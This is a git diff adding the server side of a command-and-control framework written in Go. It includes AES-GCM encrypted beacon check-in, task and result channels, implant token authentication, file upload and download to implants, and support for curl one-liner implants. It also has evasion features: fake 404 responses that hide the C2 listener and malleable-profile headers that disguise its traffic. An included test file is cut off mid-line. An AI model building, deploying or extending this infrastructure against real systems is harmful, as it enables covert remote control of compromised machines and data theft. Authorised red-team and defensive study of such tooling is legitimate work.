diff --git a/c2/beacon_host.go b/c2/beacon_host.go new file mode 100644 index 00000000..9899c6a6 --- /dev/null +++ b/c2/beacon_host.go @@ -0,0 +1,39 @@ +package c2 + +import ( + "strings" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。 +// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host(0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。 +func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string { + if h := strings.TrimSpace(explicitOverride); h != "" { + return h + } + cfg := &ListenerConfig{} + if listener != nil && listener.ConfigJSON != "" { + _ = parseJSON(listener.ConfigJSON, cfg) + } + if h := strings.TrimSpace(cfg.CallbackHost); h != "" { + return h + } + if listener == nil { + return "127.0.0.1" + } + host := strings.TrimSpace(listener.BindHost) + if host == "0.0.0.0" || host == "" || host == "::" { + host = detectExternalIP() + if host == "" { + if logger != nil { + logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host", + zap.String("listener_id", listenerID)) + } + return "127.0.0.1" + } + } + return host +} diff --git a/c2/crypto.go b/c2/crypto.go new file mode 100644 index 00000000..bf4c5ddd --- /dev/null +++ b/c2/crypto.go @@ -0,0 +1,154 @@ +package c2 + +import ( + "crypto/aes" + "crypto/cipher" + "crypto/rand" + "encoding/base64" + "errors" + "io" +) + +// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。 +// 协议格式(base64 文本,便于 HTTP body / SSE 直接传): +// base64( nonce(12) || ciphertext+tag ) +// 设计要点: +// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC; +// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次); +// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。 + +// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出 +func GenerateAESKey() (string, error) { + key := make([]byte, 32) + if _, err := io.ReadFull(rand.Reader, key); err != nil { + return "", err + } + return base64.StdEncoding.EncodeToString(key), nil +} + +// GenerateImplantToken 生成 32 字节 token,base64 编码(implant 携带在 HTTP header 鉴权用) +func GenerateImplantToken() (string, error) { + t := make([]byte, 32) + if _, err := io.ReadFull(rand.Reader, t); err != nil { + return "", err + } + return base64.RawURLEncoding.EncodeToString(t), nil +} + +// EncryptAESGCM 加密任意明文,返回 base64(nonce||ct) +func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) { + key, err := decodeKey(keyB64) + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := io.ReadFull(rand.Reader, nonce); err != nil { + return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, nil) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +// DecryptAESGCM 解密 base64(nonce||ct),返回明文 +func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) { + key, err := decodeKey(keyB64) + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(encB64) + if err != nil { + return nil, errors.New("ciphertext base64 invalid") + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + nonceSize := gcm.NonceSize() + if len(raw) < nonceSize+16 { // 至少 nonce + tag + return nil, errors.New("ciphertext too short") + } + nonce, ct := raw[:nonceSize], raw[nonceSize:] + pt, err := gcm.Open(nil, nonce, ct, nil) + if err != nil { + return nil, errors.New("aead open failed (key mismatch or tampered)") + } + return pt, nil +} + +// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to context (e.g. session_id). +// Prevents cross-session replay: ciphertext from session A cannot be fed to session B. +func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) { + key, err := decodeKey(keyB64) + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := io.ReadFull(rand.Reader, nonce); err != nil { + return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, aad) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +// DecryptAESGCMWithAAD decrypts with AAD verification. +func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) { + key, err := decodeKey(keyB64) + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(encB64) + if err != nil { + return nil, errors.New("ciphertext base64 invalid") + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + nonceSize := gcm.NonceSize() + if len(raw) < nonceSize+16 { + return nil, errors.New("ciphertext too short") + } + nonce, ct := raw[:nonceSize], raw[nonceSize:] + pt, err := gcm.Open(nil, nonce, ct, aad) + if err != nil { + return nil, errors.New("aead open failed (key mismatch, tampered, or AAD mismatch)") + } + return pt, nil +} + +func decodeKey(keyB64 string) ([]byte, error) { + key, err := base64.StdEncoding.DecodeString(keyB64) + if err != nil { + return nil, errors.New("key base64 invalid") + } + if len(key) != 32 { + return nil, errors.New("key must be 32 bytes (AES-256)") + } + return key, nil +} diff --git a/c2/eventbus.go b/c2/eventbus.go new file mode 100644 index 00000000..e1527500 --- /dev/null +++ b/c2/eventbus.go @@ -0,0 +1,144 @@ +package c2 + +import ( + "sync" + "sync/atomic" + "time" +) + +// Event 是 EventBus 内部传输的事件单元,是 database.C2Event 的"实时投影"。 +// 区别在于: +// - 数据库表保存全部历史,用于审计与列表分页; +// - EventBus 只缓存最近 N 条,用于 SSE/WS 实时推送给在线订阅者。 +type Event struct { + ID string `json:"id"` + Level string `json:"level"` + Category string `json:"category"` + SessionID string `json:"sessionId,omitempty"` + TaskID string `json:"taskId,omitempty"` + Message string `json:"message"` + Data map[string]interface{} `json:"data,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// EventBus 简单的内存广播总线。 +// 设计要点: +// - 多订阅者:每个订阅者有独立 buffered channel,慢消费者不会阻塞 publisher; +// - 容量满即丢弃:发布端绝不阻塞,避免 listener accept loop / beacon handler 卡住; +// - 全局过滤:订阅时可限定 SessionID/Category,前端按需订阅,省 CPU; +// - 关闭安全:Close() 后所有订阅者 chan 关闭,防止 goroutine 泄漏。 +type EventBus struct { + mu sync.RWMutex + subscribers map[string]*Subscription + closed bool +} + +// Subscription 订阅句柄 +type Subscription struct { + ID string + Ch chan *Event + SessionID string // 空表示不限制 + Category string // 空表示不限制 + Levels map[string]struct{} + dropCount atomic.Int64 +} + +// NewEventBus 创建总线 +func NewEventBus() *EventBus { + return &EventBus{subscribers: make(map[string]*Subscription)} +} + +// Subscribe 注册订阅者;返回 Subscription,调用方负责后续 Unsubscribe。 +// - bufferSize:单订阅者 channel 容量,建议 64~256; +// - sessionFilter / categoryFilter:空字符串=不限; +// - levelFilter:[]string{"warn","critical"} 这类,nil/空表示全收。 +func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription { + if bufferSize <= 0 { + bufferSize = 128 + } + sub := &Subscription{ + ID: id, + Ch: make(chan *Event, bufferSize), + SessionID: sessionFilter, + Category: categoryFilter, + } + if len(levelFilter) > 0 { + sub.Levels = make(map[string]struct{}, len(levelFilter)) + for _, l := range levelFilter { + sub.Levels[l] = struct{}{} + } + } + b.mu.Lock() + defer b.mu.Unlock() + if b.closed { + close(sub.Ch) + return sub + } + b.subscribers[id] = sub + return sub +} + +// Unsubscribe 注销订阅者并关闭 channel +func (b *EventBus) Unsubscribe(id string) { + b.mu.Lock() + defer b.mu.Unlock() + if sub, ok := b.subscribers[id]; ok { + delete(b.subscribers, id) + close(sub.Ch) + } +} + +// Publish 广播事件给所有订阅者;非阻塞,channel 满时静默丢弃 +func (b *EventBus) Publish(e *Event) { + if e == nil { + return + } + b.mu.RLock() + subs := make([]*Subscription, 0, len(b.subscribers)) + for _, s := range b.subscribers { + if s.matches(e) { + subs = append(subs, s) + } + } + closed := b.closed + b.mu.RUnlock() + if closed { + return + } + for _, s := range subs { + select { + case s.Ch <- e: + default: + s.dropCount.Add(1) + } + } +} + +// Close 关闭总线,停止所有订阅 +func (b *EventBus) Close() { + b.mu.Lock() + defer b.mu.Unlock() + if b.closed { + return + } + b.closed = true + for id, s := range b.subscribers { + close(s.Ch) + delete(b.subscribers, id) + } +} + +func (s *Subscription) matches(e *Event) bool { + if s.SessionID != "" && e.SessionID != s.SessionID { + return false + } + if s.Category != "" && e.Category != s.Category { + return false + } + if len(s.Levels) > 0 { + if _, ok := s.Levels[e.Level]; !ok { + return false + } + } + return true +} diff --git a/c2/hitl_context.go b/c2/hitl_context.go new file mode 100644 index 00000000..ac642233 --- /dev/null +++ b/c2/hitl_context.go @@ -0,0 +1,29 @@ +package c2 + +import "context" + +type hitlRunCtxKey struct{} + +// WithHITLRunContext 将 runCtx(通常为整条 Agent / SSE 请求生命周期)挂到传入的 ctx 上。 +// MCP 工具 handler 收到的 ctx 可能是带单次工具超时的子 context,在工具 return 时会被 cancel; +// 危险任务 HITL 应通过 HITLUserContext 使用 runCtx 等待人工审批。 +func WithHITLRunContext(ctx, runCtx context.Context) context.Context { + if ctx == nil || runCtx == nil { + return ctx + } + return context.WithValue(ctx, hitlRunCtxKey{}, runCtx) +} + +// HITLUserContext 返回用于 C2 危险任务 HITL 等待的 context: +// 若曾用 WithHITLRunContext 注入更长寿命的 runCtx 则返回之,否则返回 ctx。 +func HITLUserContext(ctx context.Context) context.Context { + if ctx == nil { + return context.Background() + } + if v := ctx.Value(hitlRunCtxKey{}); v != nil { + if run, ok := v.(context.Context); ok && run != nil { + return run + } + } + return ctx +} diff --git a/c2/io.go b/c2/io.go new file mode 100644 index 00000000..b916a07e --- /dev/null +++ b/c2/io.go @@ -0,0 +1,22 @@ +package c2 + +import ( + "encoding/base64" + "os" +) + +// 这些薄封装存在的目的: +// - 让 manager.go / handler 中的逻辑更直观,避免反复 import os; +// - 便于将来用接口抽象(譬如改成 internal/storage 的实现)做单元测试。 + +func osMkdirAll(path string, perm os.FileMode) error { + return os.MkdirAll(path, perm) +} + +func osWriteFile(path string, data []byte, perm os.FileMode) error { + return os.WriteFile(path, data, perm) +} + +func base64Decode(s string) ([]byte, error) { + return base64.StdEncoding.DecodeString(s) +} diff --git a/c2/listener.go b/c2/listener.go new file mode 100644 index 00000000..04063ddc --- /dev/null +++ b/c2/listener.go @@ -0,0 +1,69 @@ +package c2 + +import ( + "strings" + "sync" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// Listener 监听器抽象:每种传输方式(TCP/HTTP/HTTPS/WS/DNS)都实现此接口; +// Manager 不感知具体实现细节,通过 ListenerRegistry 工厂创建。 +type Listener interface { + // Type 返回当前 listener 的类型字符串(如 "tcp_reverse") + Type() string + // Start 启动监听;如果端口被占用应返回 ErrPortInUse + Start() error + // Stop 停止监听并释放所有相关 goroutine(不应抛 panic) + Stop() error +} + +// ListenerCreationCtx 工厂初始化 listener 时收到的上下文 +type ListenerCreationCtx struct { + Listener *database.C2Listener + Config *ListenerConfig + Manager *Manager + Logger *zap.Logger +} + +// ListenerFactory 创建 listener 实例的工厂;返回的实例尚未 Start +type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error) + +// ListenerRegistry 类型 → 工厂 的注册表,由 internal/app 启动时注册具体实现, +// 测试中也可注入 mock 工厂来覆盖。 +type ListenerRegistry struct { + mu sync.RWMutex + factories map[string]ListenerFactory +} + +// NewListenerRegistry 创建空注册表 +func NewListenerRegistry() *ListenerRegistry { + return &ListenerRegistry{factories: make(map[string]ListenerFactory)} +} + +// Register 注册一种 listener 工厂 +func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) { + r.mu.Lock() + defer r.mu.Unlock() + r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f +} + +// Get 取工厂;nil 表示未注册 +func (r *ListenerRegistry) Get(typeName string) ListenerFactory { + r.mu.RLock() + defer r.mu.RUnlock() + return r.factories[strings.ToLower(strings.TrimSpace(typeName))] +} + +// RegisteredTypes 列出已注册的类型,给前端枚举用 +func (r *ListenerRegistry) RegisteredTypes() []string { + r.mu.RLock() + defer r.mu.RUnlock() + out := make([]string, 0, len(r.factories)) + for k := range r.factories { + out = append(out, k) + } + return out +} diff --git a/c2/listener_http.go b/c2/listener_http.go new file mode 100644 index 00000000..52bf5f18 --- /dev/null +++ b/c2/listener_http.go @@ -0,0 +1,549 @@ +package c2 + +import ( + "crypto/ecdsa" + "crypto/elliptic" + "crypto/rand" + "crypto/sha256" + "crypto/subtle" + "crypto/tls" + "crypto/x509" + "crypto/x509/pkix" + "encoding/base64" + "encoding/hex" + "encoding/json" + "encoding/pem" + "errors" + "fmt" + "io" + "math/big" + mrand "math/rand" + "net" + "net/http" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// HTTPBeaconListener 实现 HTTP/HTTPS Beacon: +// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body); +// - 服务端解密、登记会话、回执 sleep + 是否有任务; +// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表; +// - 任务完成后 POST {result_path} 回传结果。 +// +// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。 +type HTTPBeaconListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + useTLS bool + profile *database.C2Profile + + srv *http.Server + mu sync.Mutex + stopCh chan struct{} + stopped bool +} + +// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"]) +func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) { + return &HTTPBeaconListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + useTLS: false, + stopCh: make(chan struct{}), + }, nil +} + +// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"]) +func NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) { + return &HTTPBeaconListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + useTLS: true, + stopCh: make(chan struct{}), + }, nil +} + +// Type 类型字符串 +func (l *HTTPBeaconListener) Type() string { + if l.useTLS { + return string(ListenerTypeHTTPSBeacon) + } + return string(ListenerTypeHTTPBeacon) +} + +// Start 起 HTTP server +func (l *HTTPBeaconListener) Start() error { + // Load Malleable Profile if configured + l.loadProfile() + + mux := http.NewServeMux() + mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn)) + mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks)) + mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult)) + mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload)) + mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe)) + + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + l.srv = &http.Server{ + Addr: addr, + Handler: mux, + ReadHeaderTimeout: 15 * time.Second, + ReadTimeout: 60 * time.Second, + WriteTimeout: 120 * time.Second, + IdleTimeout: 300 * time.Second, + } + + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + + if l.useTLS { + tlsConfig, err := l.buildTLSConfig() + if err != nil { + _ = ln.Close() + return fmt.Errorf("build TLS config: %w", err) + } + l.srv.TLSConfig = tlsConfig + go func() { + if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err)) + } + }() + } else { + go func() { + if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("http_beacon Serve exited", zap.Error(err)) + } + }() + } + return nil +} + +// Stop 关闭 +func (l *HTTPBeaconListener) Stop() error { + l.mu.Lock() + if l.stopped { + l.mu.Unlock() + return nil + } + l.stopped = true + close(l.stopCh) + l.mu.Unlock() + if l.srv != nil { + ctx, cancel := contextWithTimeout(5 * time.Second) + defer cancel() + _ = l.srv.Shutdown(ctx) + } + return nil +} + +// ---------------------------------------------------------------------------- +// HTTP handlers +// ---------------------------------------------------------------------------- + +func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + + // 尝试 AES-GCM 解密(完整 beacon 二进制走加密通道) + var req ImplantCheckInRequest + plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if decErr == nil { + if err := json.Unmarshal(plaintext, &req); err != nil { + l.disguisedReject(w) + return + } + } else { + // 解密失败:尝试当作明文 JSON(兼容 curl oneliner 等轻量级客户端) + if err := json.Unmarshal(body, &req); err != nil { + l.disguisedReject(w) + return + } + } + isPlaintext := decErr != nil + + if req.UserAgent == "" { + req.UserAgent = r.UserAgent() + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + // curl oneliner 可能不携带完整字段,用 remote IP + listener ID 生成稳定标识 + host, _, _ := net.SplitHostPort(r.RemoteAddr) + if strings.TrimSpace(req.ImplantUUID) == "" { + // 基于 IP + listener ID 生成稳定 UUID,同一 IP 多次 check_in 复用同一会话 + req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID)) + } + if strings.TrimSpace(req.Hostname) == "" { + req.Hostname = "curl_" + host + } + if strings.TrimSpace(req.InternalIP) == "" { + req.InternalIP = host + } + if strings.TrimSpace(req.OS) == "" { + req.OS = "unknown" + } + if strings.TrimSpace(req.Arch) == "" { + req.Arch = "unknown" + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + http.Error(w, "ingest failed", http.StatusInternalServerError) + return + } + queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: session.ID, + Status: string(TaskQueued), + Limit: 1, + }) + resp := ImplantCheckInResponse{ + SessionID: session.ID, + NextSleep: session.SleepSeconds, + NextJitter: session.JitterPercent, + HasTasks: len(queued) > 0, + ServerTime: time.Now().UnixMilli(), + } + if isPlaintext { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodGet { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + sessionID := r.URL.Query().Get("session_id") + if sessionID == "" { + l.disguisedReject(w) + return + } + session, err := l.manager.DB().GetC2Session(sessionID) + if err != nil || session == nil { + l.disguisedReject(w) + return + } + envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50) + if err != nil { + http.Error(w, "pop tasks failed", http.StatusInternalServerError) + return + } + if envelopes == nil { + envelopes = []TaskEnvelope{} + } + resp := map[string]interface{}{"tasks": envelopes} + if l.isPlaintextClient(r) { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + var report TaskResultReport + plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if decErr == nil { + if err := json.Unmarshal(plaintext, &report); err != nil { + l.disguisedReject(w) + return + } + } else { + if err := json.Unmarshal(body, &report); err != nil { + l.disguisedReject(w) + return + } + } + if err := l.manager.IngestTaskResult(report); err != nil { + http.Error(w, "ingest result failed", http.StatusInternalServerError) + return + } + resp := map[string]string{"ok": "1"} + if l.isPlaintextClient(r) { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。 +// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。 +func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + taskID := r.URL.Query().Get("task_id") + if taskID == "" { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if err != nil { + l.disguisedReject(w) + return + } + dir := filepath.Join(l.manager.StorageDir(), "uploads") + if err := os.MkdirAll(dir, 0o755); err != nil { + http.Error(w, "mkdir failed", http.StatusInternalServerError) + return + } + dst := filepath.Join(dir, taskID+".bin") + if err := os.WriteFile(dst, plaintext, 0o644); err != nil { + http.Error(w, "save failed", http.StatusInternalServerError) + return + } + l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)}) +} + +// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。 +// 路径形如 /file/,文件内容经 AES-GCM 加密后返回。 +func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodGet { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + prefix := l.cfg.BeaconFilePath + taskID := strings.TrimPrefix(r.URL.Path, prefix) + if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") { + l.disguisedReject(w) + return + } + fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin") + absPath, err := filepath.Abs(fpath) + if err != nil { + l.disguisedReject(w) + return + } + absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream")) + if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) { + l.disguisedReject(w) + return + } + data, err := os.ReadFile(absPath) + if err != nil { + l.disguisedReject(w) + return + } + l.writeEncrypted(w, map[string]interface{}{ + "file_data": base64Encode(data), + }) +} + +// ---------------------------------------------------------------------------- +// 鉴权 / 输出辅助 +// ---------------------------------------------------------------------------- + +// checkImplantToken 校验 X-Implant-Token header(恒定时间比较防止时序攻击) +func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool { + got := r.Header.Get("X-Implant-Token") + if got == "" { + got = r.Header.Get("Cookie") // 兼容 Malleable Profile 用 Cookie 携带 + } + expected := l.rec.ImplantToken + if got == "" || expected == "" { + return false + } + return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1 +} + +// disguisedReject 鉴权失败时返回 404,避免暴露 listener 是 C2 +func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) { + w.Header().Set("Content-Type", "text/html; charset=utf-8") + w.WriteHeader(http.StatusNotFound) + _, _ = fmt.Fprint(w, "

404 Not Found

") +} + +// writeEncrypted JSON 序列化 + AES-GCM 加密 + 写回 +func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) { + body, err := json.Marshal(payload) + if err != nil { + http.Error(w, "encode failed", http.StatusInternalServerError) + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + http.Error(w, "encrypt failed", http.StatusInternalServerError) + return + } + w.Header().Set("Content-Type", "application/octet-stream") + _, _ = w.Write([]byte(enc)) +} + +// loadProfile loads Malleable Profile from DB if the listener has a profile_id configured +func (l *HTTPBeaconListener) loadProfile() { + if l.rec.ProfileID == "" { + return + } + profile, err := l.manager.GetProfile(l.rec.ProfileID) + if err != nil || profile == nil { + l.logger.Warn("加载 Malleable Profile 失败,使用默认配置", + zap.String("profile_id", l.rec.ProfileID), zap.Error(err)) + return + } + l.profile = profile + l.logger.Info("Malleable Profile 已加载", + zap.String("profile_id", profile.ID), + zap.String("profile_name", profile.Name), + zap.String("user_agent", profile.UserAgent)) +} + +// withProfileHeaders wraps a handler to inject Malleable Profile response headers +func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + if l.profile != nil && len(l.profile.ResponseHeaders) > 0 { + for k, v := range l.profile.ResponseHeaders { + w.Header().Set(k, v) + } + } + next(w, r) + } +} + +// ---------------------------------------------------------------------------- +// TLS 自签证书(仅供测试 / Phase 2 默认行为) +// ---------------------------------------------------------------------------- + +func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) { + // 操作员显式提供证书 → 优先使用 + if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" { + cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath) + if err == nil { + return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil + } + l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err)) + } + // 自签证书:CN 用 listener 名,避免重复 + cert, err := generateSelfSignedCert(l.rec.Name) + if err != nil { + return nil, err + } + return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil +} + +func generateSelfSignedCert(cn string) (tls.Certificate, error) { + priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) + if err != nil { + return tls.Certificate{}, err + } + serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62)) + tmpl := &x509.Certificate{ + SerialNumber: serial, + Subject: pkix.Name{CommonName: cn}, + NotBefore: time.Now().Add(-1 * time.Hour), + NotAfter: time.Now().Add(365 * 24 * time.Hour), + KeyUsage: x509.KeyUsageDigitalSignature, + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, + IPAddresses: []net.IP{net.ParseIP("127.0.0.1")}, + DNSNames: []string{"localhost"}, + } + der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv) + if err != nil { + return tls.Certificate{}, err + } + keyDER, err := x509.MarshalECPrivateKey(priv) + if err != nil { + return tls.Certificate{}, err + } + certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}) + keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER}) + return tls.X509KeyPair(certPEM, keyPEM) +} + +func base64Encode(data []byte) string { + return base64.StdEncoding.EncodeToString(data) +} + +func shortHash(s string) string { + h := sha256.Sum256([]byte(s)) + return hex.EncodeToString(h[:6]) +} + +// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等) +// 完整 beacon 二进制会设置 Content-Type: application/octet-stream +func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool { + ct := r.Header.Get("Content-Type") + accept := r.Header.Get("Accept") + return strings.Contains(ct, "application/json") || + strings.Contains(accept, "application/json") || + strings.Contains(r.UserAgent(), "curl/") +} + +// ApplyJitter 给定基础 sleep + jitter 百分比,返回随机抖动后的 duration +// 公开给 listener_websocket / payload 模板共用,避免重复实现 +func ApplyJitter(baseSec, jitterPercent int) time.Duration { + if baseSec <= 0 { + return 0 + } + if jitterPercent <= 0 { + return time.Duration(baseSec) * time.Second + } + if jitterPercent > 100 { + jitterPercent = 100 + } + delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j] + factor := 1.0 + float64(delta)/100.0 + return time.Duration(float64(baseSec)*factor) * time.Second +} diff --git a/c2/listener_http_test.go b/c2/listener_http_test.go new file mode 100644 index 00000000..f7109233 --- /dev/null +++ b/c2/listener_http_test.go @@ -0,0 +1,129 @@ +package c2 + +import ( + "bytes" + "encoding/json" + "io" + "net" + "net/http" + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// 集成验证:路由、鉴权伪装 404、明文 check-in JSON 回包。 +func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "c2.sqlite") + db, err := database.NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + + lnPick, err := net.Listen("tcp", "127.0.0.1:0") + if err != nil { + t.Fatal(err) + } + port := lnPick.Addr().(*net.TCPAddr).Port + _ = lnPick.Close() + + keyB64, err := GenerateAESKey() + if err != nil { + t.Fatal(err) + } + token := "test-implant-token-fixed" + + lid := "l_testhttpbeacon01" + rec := &database.C2Listener{ + ID: lid, + Name: "t", + Type: string(ListenerTypeHTTPBeacon), + BindHost: "127.0.0.1", + BindPort: port, + EncryptionKey: keyB64, + ImplantToken: token, + Status: "stopped", + ConfigJSON: `{"beacon_check_in_path":"/check_in"}`, + CreatedAt: time.Now(), + } + if err := 